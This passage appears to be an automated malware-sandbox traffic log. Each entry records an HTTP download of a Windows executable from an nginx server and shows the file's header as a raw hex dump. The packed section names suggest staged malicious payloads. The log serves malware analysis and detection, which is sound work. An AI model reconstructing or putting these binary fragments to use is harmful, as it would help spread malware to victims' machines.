c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 15 84 9e 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 fa 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 0f 00 00 04 00 00 60 24 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 48 3e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 48 3e 01 00 00 40 0d 00 00 40 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 80 0e 00 00 76 00 00 00 34 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:37:46 GMTContent-Type: application/octet-streamContent-Length: 1828864Last-Modified: Sat, 01 Feb 2025 20:32:10 GMTConnection: keep-aliveETag: "679e84ca-1be800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 cb bd 98 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 e0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 6a 00 00 04 00 00 7f 7c 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 72 7a 61 72 6a 61 6b 00 50 1a 00 00 80 4f 00 00 42 1a 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 6c 71 63 65 68 61 61 00 10 00 00 00 d0 69 00 00 04 00 00 00 c2 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 69 00 00 22 00 00 00 c6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:37:49 GMTContent-Type: application/octet-streamContent-Length: 1863680Last-Modified: Sat, 01 Feb 2025 19:07:59 GMTConnection: keep-aliveETag: "679e710f-1c7000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 80 bc 97 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d4 02 00 00 6e 01 00 00 00 00 00 00 a0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 b1 f8 1c 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 d0 7f 4a 00 57 00 00 00 56 40 04 00 6a 00 00 00 00 30 04 00 0c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 04 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 04 00 00 10 00 00 00 dc 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 0c 04 00 00 00 30 04 00 00 04 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 40 04 00 00 02 00 00 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2b 00 00 50 04 00 00 02 00 00 00 f2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 63 70 73 67 77 70 74 00 60 1a 00 00 30 30 00 00 54 1a 00 00 f4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 61 72 74 72 6a 6e 70 00 10 00 00 00 90 4a 00 00 06 00 00 00 48 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 4a 00 00 22 00 00 00 4e 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:37:48 GMTContent-Type: application/octet-streamContent-Length: 3034624Last-Modified: Sat, 01 Feb 2025 20:32:21 GMTConnection: keep-aliveETag: "679e84d5-2e4e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 00 32 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 32 00 00 04 00 00 8b 84 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 df 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 df 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a8 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 71 65 72 74 7a 6d 69 00 40 2b 00 00 b0 06 00 00 34 2b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 76 73 6e 78 75 74 74 00 10 00 00 00 f0 31 00 00 04 00 00 00 28 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 32 00 00 22 00 00 00 2c 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:37:55 GMTContent-Type: application/octet-streamContent-Length: 1958912Last-Modified: Sat, 01 Feb 2025 20:31:38 GMTConnection: keep-aliveETag: "679e84aa-1de400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 97 69 b8 cb d3 08 d6 98 d3 08 d6 98 d3 08 d6 98 6e 47 40 98 d2 08 d6 98 cd 5a 52 98 ce 08 d6 98 cd 5a 43 98 c7 08 d6 98 cd 5a 55 98 b8 08 d6 98 f4 ce ad 98 d6 08 d6 98 d3 08 d7 98 a0 08 d6 98 cd 5a 5c 98 d2 08 d6 98 cd 5a 42 98 d2 08 d6 98 cd 5a 47 98 d2 08 d6 98 52 69 63 68 d3 08 d6 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a8 2c b1 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 da 02 00 00 3e 01 00 00 00 00 00 00 60 86 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 86 00 00 04 00 00 ed 0f 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b 80 41 00 6f 00 00 00 00 d0 40 00 9c ad 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 e0 85 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 40 00 00 10 00 00 00 4e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c ad 00 00 00 d0 40 00 00 70 00 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 41 00 00 02 00 00 00 ce 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 29 00 00 90 41 00 00 02 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 68 78 77 64 71 67 72 00 f0 1a 00 00 60 6b 00 00 ec 1a 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 7a 76 6f 75 71 63 6c 00 10 00 00 00 50 86 00 00 04 00 00 00 be 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 86 00 00 22 00 00 00 c2 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:38:00 GMTContent-Type: application/octet-streamContent-Length: 1895936Last-Modified: Sat, 01 Feb 2025 13:57:48 GMTConnection: keep-aliveETag: "679e285c-1cee00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 6e 4e 99 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 6a 04 00 00 ae 00 00 00 00 00 00 00 c0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4a 00 00 04 00 00 20 ac 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 05 00 6b 00 00 00 00 90 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 90 05 00 00 02 00 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 2a 00 00 b0 05 00 00 02 00 00 00 a4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 7a 6f 6d 61 66 76 71 00 30 1a 00 00 80 30 00 00 22 1a 00 00 a6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 78 6d 67 76 79 6e 7a 00 10 00 00 00 b0 4a 00 00 04 00 00 00 c8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4a 00 00 22 00 00 00 cc 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:38:07 GMTContent-Type: application/octet-streamContent-Length: 4508672Last-Modified: Mon, 20 Jan 2025 12:26:20 GMTConnection: keep-aliveETag: "678e40ec-44cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 75 5d 91 c9 31 3c ff 9a 31 3c ff 9a 31 3c ff 9a 43 bd fc 9b 3a 3c ff 9a 43 bd fa 9b be 3c ff 9a 43 bd fb 9b 22 3c ff 9a 20 ba fc 9b 25 3c ff 9a 20 ba fb 9b 23 3c ff 9a 20 ba fa 9b 1a 3c ff 9a 43 bd fe 9b 36 3c ff 9a 31 3c fe 9a b2 3c ff 9a b5 ba fb 9b 30 3c ff 9a b5 ba fd 9b 30 3c ff 9a 52 69 63 68 31 3c ff 9a 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 80 39 8e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 16 3e 00 00 c8 06 00 00 00 00 00 65 e3 1e 00 00 10 00 00 00 10 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 63 00 00 04 00 00 e1 51 45 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 02 5e 00 50 00 00 00 00 a0 5f 00 90 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 5e 00 e8 0c 01 00 08 97 5d 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 96 5d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 62 73 73 20 b5 1e 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 e0 2e 74 65 78 74 00 00 00 dd 14 3e 00 00 d0 1e 00 00 16 3e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 1f cf 00 00 00 f0 5c 00 00 d0 00 00 00 1a 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 3f 00 00 00 c0 5d 00 00 2a 00 00 00 ea 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 8c 11 00 00 00 00 5e 00 00 12 00 00 00 14 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 6d 73 76 63 6a 6d 63 c1 01 00 00 00 20 5e 00 00 02 00 00 00 26 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 70 74 61 62 6c 65 99 01 00 00 00 30 5e 00 00 02 00 00 00 28 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 87 5f 01 00 00 40 5e 00 00 60 01 00 00 2a 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 90 40 04 00 00 a0 5f 00 00 42 04 00 00 8a 40 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:38:07 GMTContent-Type: application/octet-streamContent-Length: 3034624Last-Modified: Sat, 01 Feb 2025 20:32:21 GMTConnection: keep-aliveETag: "679e84d5-2e4e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 